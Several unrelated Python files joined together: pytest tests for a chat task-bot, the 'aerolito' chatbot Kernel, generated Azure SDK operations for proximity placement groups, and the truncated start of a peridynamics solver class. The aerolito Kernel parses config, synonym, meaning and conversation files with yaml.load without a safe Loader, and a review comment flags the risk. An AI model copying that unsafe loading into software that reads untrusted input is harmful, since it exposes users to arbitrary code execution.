    async with build_context() as ctx:
        tasks = await ctx.add_test_tasks(init_state)
        last_id = tasks[-1]._id

        # Alice sends the plain-text command.
        await ctx.dialog([
            command,
        ])

        updated = await tasks_document.TaskDocument.objects.find_by_id(last_id)

        # Bob confirms (or warns that the task is already in that state).
        await ctx.dialog([
            None,
            should_get_answer.format(updated.description),
        ])

        assert updated.state == should_get_state
@pytest.mark.asyncio
async def test_start_certain_task(build_context):
    """A START_TASKS_<id>,<id> postback starts exactly the listed tasks and
    the bot answers with a checkmark line per started task."""
    async with build_context() as ctx:
        tasks = await ctx.add_test_tasks(props=[{
            'state': 'open',
        }, {
            'state': 'open',
        }, {
            'state': 'open',
        }])
        first = tasks[-1]
        second = tasks[-2]

        check_line = emoji.emojize(':white_check_mark: {}')
        expected_listing = '\n'.join(
            check_line.format(d) for d in (first.description, second.description))

        await ctx.dialog([
            # Alice:
            env.build_postback('START_TASKS_{},{}'.format(first._id, second._id)),
            # Bob:
            ':ok: Tasks were started:\n{}'.format(expected_listing),
        ])
@pytest.mark.asyncio
@pytest.mark.parametrize(('command', 'should_get_answer', 'should_get_states'), [
    ('open all', ':ok: Task was opened:\n{}', ['open', 'in progress']),
    (env.build_postback('REOPEN_ALL_TASK'), ':ok: Task was opened:\n{}', ['open', 'in progress']),
    ('start all', ':ok: Task was started:\n{}', ['in progress', 'done']),
    (env.build_postback('START_ALL_TASK'), ':ok: Task was started:\n{}', ['in progress', 'done']),
    ('stop all', ':ok: Task was stopped:\n{}', ['open', 'done']),
    (env.build_postback('STOP_ALL_TASK'), ':ok: Task was stopped:\n{}', ['open', 'done']),
    ('done all', ':ok: Tasks were done:\n{}', ['done']),
    (env.build_postback('DONE_ALL_TASK'), ':ok: Tasks were done:\n{}', ['done']),
])
async def test_change_state_of_all_tasks(
        build_context, command, should_get_answer, should_get_states):
    """A bulk '<verb> all' command moves every task into an accepted state
    and the bot lists exactly the tasks that changed."""
    async with build_context() as ctx:
        tasks = await ctx.add_test_tasks()
        descriptions_to_change = [
            t.description for t in tasks if t.state not in should_get_states
        ]

        # Alice issues the bulk command.
        await ctx.dialog([
            command,
        ])

        # Every stored task must now be in one of the accepted states.
        for task in tasks:
            refreshed = await tasks_document.TaskDocument.objects.find_by_id(task._id)
            assert refreshed.state in should_get_states

        check_line = emoji.emojize(':white_check_mark: {}')
        listing = '\n'.join(check_line.format(d) for d in descriptions_to_change)

        # Bob lists the modified tasks.
        await ctx.dialog([
            None,
            should_get_answer.format(listing),
        ])
@pytest.mark.asyncio
@pytest.mark.parametrize(('command', 'command_name'), [
    ('open all', 'open'),
    ('start all', 'start'),
    ('stop all', 'stop'),
    ('done all', 'done'),
])
async def test_warn_if_there_is_no_tasks_to_apply_changes_for_all(
        build_context, command, command_name):
    """With an empty task list, a bulk '<verb> all' command yields a
    there-is-nothing-to-do warning."""
    async with build_context() as ctx:
        expected_warning = 'There is no task to {}'.format(command_name)
        # Alice sends the bulk command; Bob warns there is nothing to do.
        await ctx.dialog([
            command,
            expected_warning,
        ])
@pytest.mark.asyncio
@pytest.mark.parametrize(('command', 'command_name'), [
    ('open last', 'open'),
    ('start last', 'start'),
    ('stop last', 'stop'),
    ('done last', 'done'),
])
async def test_warn_if_there_is_no_tasks_to_apply_changes_for_last(
        build_context, command, command_name):
    """With an empty task list, a '<verb> last' command yields a warning.

    BUG FIX: this test previously shared its name with two other tests in
    this module, so only the final definition was collected by pytest and
    the earlier ones were silently never run.  Renamed to make it unique.
    """
    async with build_context() as ctx:
        await ctx.dialog([
            # Alice:
            command,
            # Bob:
            'You do not have any task to {}'.format(command_name),
        ])
@pytest.mark.asyncio
@pytest.mark.parametrize('command', [
    env.build_postback('STOP_TASK_58ec13b91c8dea00012fa1a2'),
    env.build_postback('DONE_TASK_58ec13b91c8dea00012fa1a2'),
    # NOTE(review): START_TASK used to appear twice here; the exact
    # duplicate was dropped. A REOPEN_TASK case may have been intended --
    # confirm with the module owner.
    env.build_postback('START_TASK_58ec13b91c8dea00012fa1a2'),
])
async def test_warn_if_task_is_not_found(build_context, command):
    """Acting on an unknown task id yields a "can't find that task" answer
    with add/list quick replies.

    BUG FIX: this test previously shared its name with two other tests in
    this module, so only the final definition was collected by pytest.
    Renamed to make it unique so all three tests actually run.
    """
    async with build_context() as ctx:
        await ctx.dialog([
            # Alice:
            command,
            # Bob:
            {
                'text': ':confused: I can\'t find that task. Do you mean something else?',
                'quick_replies': [{
                    'title': 'add new task',
                    'payload': 'ADD_NEW_TASK',
                }, {
                    'title': 'list tasks',
                    'payload': 'LIST_TASKS_NEW_FIRST',
                },
                ],
            },
        ])
| |
# -*- coding:utf-8 -*-
# Copyright (c) 2011 Renato de Pontes Pereira, renato.ppontes at gmail dot com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import yaml
import codecs
from aerolito import exceptions
from aerolito import directives
from aerolito.pattern import Pattern
from aerolito.pattern import remove_accents
from aerolito.pattern import normalize_input
class Kernel(object):
    u"""
    Aerolito's main object.

    Kernel uses an environment variable for session and variables controlling.
    Sessions are used for user-dependent information storage, such inputs and
    outputs logs, and local variables. Variables are devided into 3 levels:
    *stars* for pattern stars ``*``, *locals* for user-related informations,
    and *globals*.

    By default kernel sets the first user as "default" key. Its session can be
    accessed via ``_environ['session']['default']``. A kernel object has 4
    instance variables:

    _patterns
        A list of all patterns that kernel is handling.
    _synonyms
        A list of all *synonyms*.
    _meanings
        A list of all *meanings*.
    _environ
        The environment variable.
    """

    def __init__(self, config_file, encoding='utf-8'):
        u"""Initializes a kernel object, creating the user "default"."""
        self._patterns = None
        self._synonyms = None
        self._meanings = None
        self._environ = None
        self.load_config(config_file, encoding=encoding)
        self.add_user('default')
        self.set_user('default')

    def add_user(self, user_id):
        u"""
        Add a new user in session of environ variable, initializing the
        following user-dependent variables:

        - **inputs**: List with all inputs of an user.
        - **responses**: List with all outputs for an user, without
          normalizing.
        - **responses-normalized**: List with all outputs normalized.
        - **stars**: Pattern-related variables, is a list of stars that matches
          with recognized pattern (i.e., words in the place of "\*"). Is filled
          by ``after`` and ``in`` tags.
        - **locals**: Dictionary of local variables, setted via patterns in
          ``when`` or ``post`` tags.

        If ``user_id`` is already in session, an exception
        ``UserAlreadyInSession`` is raised.
        """
        if user_id in self._environ['session']:
            raise exceptions.UserAlreadyInSession(user_id)

        self._environ['session'][user_id] = {}
        session = self._environ['session'][user_id]
        session['inputs'] = []
        session['responses'] = []
        session['responses-normalized'] = []
        session['stars'] = []
        session['locals'] = {}

    def set_user(self, user_id):
        u"""
        Defines who is the active user in session. Functions and objects use
        the ``_environ['user_id']`` variable to select the correct session.
        """
        self._environ['user_id'] = user_id

    def remove_user(self, user_id):
        u"""
        Removes an user from session (no-op for unknown users).
        """
        if user_id in self._environ['session']:
            del self._environ['session'][user_id]

    def add_directive(self, name, directive):
        u"""
        Add a new directive in environment var.

        Raises ``exceptions.DuplicatedDirective`` when ``name`` is already
        registered.
        """
        # BUG FIX: ``dict.has_key`` was removed in Python 3; ``in`` is the
        # equivalent membership test on both Python 2 and 3.
        if name in self._environ['directives']:
            # BUG FIX: ``DuplicatedDirective`` was raised as a bare name,
            # which is a NameError at raise time. It lives in the
            # ``exceptions`` module like the other errors raised here
            # (DuplicatedSynonym, DuplicatedMeaning) -- confirm the exact
            # class name against aerolito.exceptions.
            raise exceptions.DuplicatedDirective(name)

        self._environ['directives'][name] = directive(self._environ)

    def __load_directives(self):
        u"""
        Loads default directives and directives of
        ``directives._directive_pool``, setted via
        ``directives.register_directive`` by users.
        """
        env_directives = self._environ['directives']
        env_directives['define'] = directives.Define(self._environ)
        env_directives['delete'] = directives.Delete(self._environ)
        env_directives['isdefined'] = directives.IsDefined(self._environ)
        env_directives['isnotdefined'] = directives.IsNotDefined(self._environ)
        env_directives['equal'] = directives.Equal(self._environ)
        env_directives['notequal'] = directives.NotEqual(self._environ)
        env_directives['greaterthan'] = directives.GreaterThan(self._environ)
        env_directives['lessthan'] = directives.LessThan(self._environ)
        env_directives['greaterequal'] = directives.GreaterEqual(self._environ)
        env_directives['lessequal'] = directives.LessEqual(self._environ)

        # BUG FIX: ``iteritems`` is Python-2-only; ``items`` behaves the
        # same here and also works on Python 3.
        for k, item in directives._directive_pool.items():
            self.add_directive(k, item)

    def load_config(self, config_file, encoding='utf-8'):
        u"""
        Loads the configuration file.

        Receive as parameters a name (with relative or full path) of
        configuration file, and its encoding. Default encoding is utf-8.

        The configuration file has a mandatory tag **conversations**, that
        specifies the conversation files: a list with the names (with relative
        or full path) of the files.

        Each kernel can load only one configuration file; if this method is
        called twice, the second call overrides the previous information (by
        resetting the environ variable).
        """
        try:
            plain_text = codecs.open(config_file, 'rb', encoding).read()
            # NOTE(review): yaml.load without an explicit Loader can execute
            # arbitrary constructors; use yaml.safe_load if config files may
            # come from untrusted sources.
            config = yaml.load(plain_text)
        except IOError:
            raise exceptions.FileNotFound(config_file)

        # Initialize environment dict
        self._environ = {
            'user_id': None,
            'meanings': None,
            'synonyms': None,
            'directives': {},
            'globals': config,
            'session': {},
        }
        self.__load_directives()

        if 'conversations' not in config:
            raise exceptions.MissingTag('conversations', 'config')

        self._synonyms = {}
        self._meanings = {}
        self._patterns = []
        self._environ['synonyms'] = self._synonyms
        self._environ['meanings'] = self._meanings

        # Synonyms and meanings must load before conversations so patterns
        # can be normalized against them.
        for synonym_file in config.get('synonyms', []):
            self.load_sysnonym(synonym_file, encoding)

        for meaning_file in config.get('meanings', []):
            self.load_meaning(meaning_file, encoding)

        for conversation_file in config['conversations']:
            self.load_conversation(conversation_file, encoding)

    def load_sysnonym(self, synonym_file, encoding='utf-8'):
        u"""
        Load a synonym file.

        Receive as parameters a name (with relative or full path) of a
        synonym file, and their encoding. Default encoding is utf-8.

        Synonym file must have at least one element. Contains a list of lists.
        The patterns are loaded in ``_synonyms``.

        NOTE(review): the method name carries a typo ("sysnonym") but is part
        of the public interface, so it is kept.
        """
        try:
            plain_text = codecs.open(synonym_file, 'rb', encoding).read()
            data = yaml.load(plain_text)
        except IOError:
            raise exceptions.FileNotFound(synonym_file)

        for synonyms in data:
            if len(synonyms) < 2:
                raise exceptions.InvalidTagValue(
                    u'Synonym list must have more than one element.')

            # First element is the canonical word; the rest map onto it.
            key = remove_accents(synonyms[0]).lower()
            vals = [remove_accents(value).lower() for value in synonyms[1:]]

            if key in self._synonyms:
                raise exceptions.DuplicatedSynonym(key, synonym_file)

            self._synonyms[key] = vals

    def load_meaning(self, meaning_file, encoding='utf-8'):
        u"""
        Load a meaning file.

        Receive as parameters a name (with relative or full path) of a
        meaning file, and their encoding. Default encoding is utf-8.

        Meaning file must have at least one element. Contains a list of lists.
        The patterns are loaded in ``_meanings``.
        """
        try:
            plain_text = codecs.open(meaning_file, 'rb', encoding).read()
            data = yaml.load(plain_text)
        except IOError:
            raise exceptions.FileNotFound(meaning_file)

        for meanings, values in data.items():
            if len(values) == 0:
                raise exceptions.InvalidTagValue(
                    u'Meaning list must have one or more element.')

            key = remove_accents(meanings).lower()
            # Meaning values are normalized through the synonym table.
            vals = [normalize_input(v, self._environ['synonyms']).lower() for v in values]

            if key in self._meanings:
                raise exceptions.DuplicatedMeaning(key, meaning_file)

            self._meanings[key] = vals

    def load_conversation(self, conversation_file, encoding='utf-8'):
        u"""
        Load a conversation file.

        Receive as parameters a name (with relative or full path) of a
        conversation file, and their encoding. Default encoding is utf-8.

        The conversation file has a mandatory tag **patterns**, that specifies
        the conversation patterns: a list of dictionaries.
        The patterns are loaded in ``_patterns``.
        """
        try:
            plain_text = codecs.open(conversation_file, 'rb', encoding).read()
            data = yaml.load(plain_text)
        except IOError:
            raise exceptions.FileNotFound(conversation_file)

        if 'patterns' not in data:
            raise exceptions.MissingTag('patterns', conversation_file)

        for p in data['patterns']:
            pattern = Pattern(p, self._environ)
            self._patterns.append(pattern)

    def respond(self, value, user_id=None, registry=True):
        u"""
        Returns a response for a given user input.

        Parameter ``value`` is the user input.

        If ``user_id`` is informed, the kernel changes the session for this
        user; if the parameter is null, kernel keeps the active user. If no
        user is informed and no user is active, kernel tries to use the
        *'default'* user; if default is not available (out of the session
        pool) an exception is raised.

        When ``registry`` is true, the input and the chosen output are
        recorded in the user's session history.

        This method can only be used after environment initialization.
        """
        # Verify initialization
        if not self._environ:
            raise exceptions.InitializationRequired('configuration')
        elif not self._patterns:
            raise exceptions.InitializationRequired('conversation')

        # Verify user's session
        if user_id is not None:
            self.set_user(user_id)
        elif self._environ['user_id'] is None:
            if 'default' in self._environ['session']:
                self.set_user('default')
            else:
                raise exceptions.NoUserActiveInSession()

        output = None
        value = normalize_input(value, self._synonyms)

        # First matching pattern wins.
        for pattern in self._patterns:
            if pattern.match(value, self._environ):
                output = pattern.choice_output(self._environ)
                pattern.execute_post(self._environ)
                break

        session = self._environ['session'][self._environ['user_id']]
        if registry:
            session['inputs'].append(value)

        if output:
            # Expand "(rec|...)" markers by recursively responding to the
            # embedded input (without recording it in the history).
            # Raw string avoids invalid-escape warnings on Python 3.
            recursive = re.findall(r'\(rec\|([^\)]*)\)', output)
            for r in recursive:
                toreplace = u'(rec|%s)' % r
                resp = self.respond(r, registry=False) or ''
                output = output.replace(toreplace, resp)

            if registry:
                session['responses'].append(output)
                session['responses-normalized'].append(normalize_input(output, self._synonyms))

        return output
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._proximity_placement_groups_operations import build_create_or_update_request, build_delete_request, build_get_request, build_list_by_resource_group_request, build_list_by_subscription_request, build_update_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ProximityPlacementGroupsOperations:
    """ProximityPlacementGroupsOperations async operations.

    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.

    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.compute.v2020_12_01.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """

    models = _models

    def __init__(self, client, config, serializer, deserializer) -> None:
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config

    @distributed_trace_async
    async def create_or_update(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        parameters: "_models.ProximityPlacementGroup",
        **kwargs: Any
    ) -> "_models.ProximityPlacementGroup":
        """Create or update a proximity placement group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :param parameters: Parameters supplied to the Create Proximity Placement Group operation.
        :type parameters: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProximityPlacementGroup, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroup"]
        # Status codes mapped to dedicated exception types; callers may extend
        # or override the mapping via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        # Serialize the model into the request body.
        _json = self._serialize.body(parameters, 'ProximityPlacementGroup')

        request = build_create_or_update_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.create_or_update.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        # Both 200 and 201 responses carry a ProximityPlacementGroup body.
        if response.status_code == 200:
            deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace_async
    async def update(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        parameters: "_models.ProximityPlacementGroupUpdate",
        **kwargs: Any
    ) -> "_models.ProximityPlacementGroup":
        """Update a proximity placement group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :param parameters: Parameters supplied to the Update Proximity Placement Group operation.
        :type parameters: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroupUpdate
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProximityPlacementGroup, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroup"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]

        # PATCH-style update: the body is the Update model, not the full resource.
        _json = self._serialize.body(parameters, 'ProximityPlacementGroupUpdate')

        request = build_update_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            content_type=content_type,
            json=_json,
            template_url=self.update.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace_async
    async def delete(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        **kwargs: Any
    ) -> None:
        """Delete a proximity placement group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_delete_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            template_url=self.delete.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        # Delete has no response body; only invoke the custom callback if given.
        if cls:
            return cls(pipeline_response, None, {})

    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace_async
    async def get(
        self,
        resource_group_name: str,
        proximity_placement_group_name: str,
        include_colocation_status: Optional[str] = None,
        **kwargs: Any
    ) -> "_models.ProximityPlacementGroup":
        """Retrieves information about a proximity placement group .

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param proximity_placement_group_name: The name of the proximity placement group.
        :type proximity_placement_group_name: str
        :param include_colocation_status: includeColocationStatus=true enables fetching the colocation
         status of all the resources in the proximity placement group.
        :type include_colocation_status: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ProximityPlacementGroup, or the result of cls(response)
        :rtype: ~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroup
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroup"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        request = build_get_request(
            resource_group_name=resource_group_name,
            proximity_placement_group_name=proximity_placement_group_name,
            subscription_id=self._config.subscription_id,
            include_colocation_status=include_colocation_status,
            template_url=self.get.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)

        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ProximityPlacementGroup', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized

    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups/{proximityPlacementGroupName}'}  # type: ignore

    @distributed_trace
    def list_by_subscription(
        self,
        **kwargs: Any
    ) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
        """Lists all proximity placement groups in a subscription.

        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroupListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroupListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page uses the operation's URL template; subsequent pages
            # use the service-provided nextLink verbatim.
            if not next_link:
                request = build_list_by_subscription_request(
                    subscription_id=self._config.subscription_id,
                    template_url=self.list_by_subscription.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                request = build_list_by_subscription_request(
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                # next-page requests are always issued as GET
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            # Deserialize one page and hand back (continuation token, items).
            deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )

    list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Compute/proximityPlacementGroups'}  # type: ignore

    @distributed_trace
    def list_by_resource_group(
        self,
        resource_group_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.ProximityPlacementGroupListResult"]:
        """Lists all proximity placement groups in a resource group.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ProximityPlacementGroupListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.compute.v2020_12_01.models.ProximityPlacementGroupListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ProximityPlacementGroupListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page uses the operation's URL template; subsequent pages
            # use the service-provided nextLink verbatim.
            if not next_link:
                request = build_list_by_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    template_url=self.list_by_resource_group.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)

            else:
                request = build_list_by_resource_group_request(
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                # next-page requests are always issued as GET
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            # Deserialize one page and hand back (continuation token, items).
            deserialized = self._deserialize("ProximityPlacementGroupListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )

    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/proximityPlacementGroups'}  # type: ignore
| |
#-*- coding: utf-8 -*-
#@author: ilyass.tabiai@polymtl.ca
#@author: rolland.delorme@polymtl.ca
#@author: patrick.diehl@polymtl.ca
import numpy as np
from ..util import neighbor
from scipy.sparse import linalg
from scipy import sparse
from ..util import linalgebra
from ..util import abstractions
## Class to define the peridynamic problem, i.e. applying boundary conditions
## to the geometry and solving the problem
class PD_problem(abstractions.Problem):

    ## Constructor
    # @param deck The input deck
    def __init__(self, deck):
        ## Family of each node
        self.neighbors = neighbor.NeighborSearch(deck)
        ## Nodes' positions stored for each time step
        self.y = np.zeros((deck.num_nodes, deck.dim, deck.time_steps), dtype=np.float64)
        self.y[:, :, 0] = deck.geometry.nodes[:, :]
        ## Global internal force density array storing the force density attached to each node
        self.force_int = np.zeros((deck.num_nodes, deck.dim, deck.time_steps), dtype=np.float64)
        ## Extension state at each node between the node and its family
        self.ext = np.zeros((deck.num_nodes, self.neighbors.max_neighbors, deck.time_steps), dtype=np.float64)
        ## Strain energy at each node between the node and its family
        self.strain_energy = np.zeros((deck.num_nodes, deck.time_steps), dtype=np.float64)
        if deck.material_type == "Viscoelastic":
            ## Viscoelastic part of the extension state at each node between the node and its family
            self.ext_visco = np.zeros((deck.num_nodes, self.neighbors.max_neighbors, len(deck.relax_time), deck.time_steps), dtype=np.float64)
        # Compute the external force density "b" applied on each node
        self.compute_b(deck)
        # Volume correction factor and weighted volume for each node
        # (both methods are provided by the abstractions.Problem base class)
        self.compute_volume_correction(deck)
        self.compute_weighted_volume(deck)

    ## Compute the external force density "b" applied on each node
    # @param deck The input deck
    def compute_b(self, deck):
        ## External force density "b" applied on each node
        self.b = np.zeros((deck.num_nodes, deck.dim, deck.time_steps), dtype=np.float64)
        for t_n in range(1, deck.time_steps):
            for con in deck.conditions:
                if con.type == "Force" and con.shape == "Ramp":
                    # Madenci approach: the load is ramped following shape_loading()
                    for i in con.id:
                        # con.direction is 1 (x), 2 (y) or 3 (z); map it to the
                        # corresponding axis index (assumes direction in {1, 2, 3})
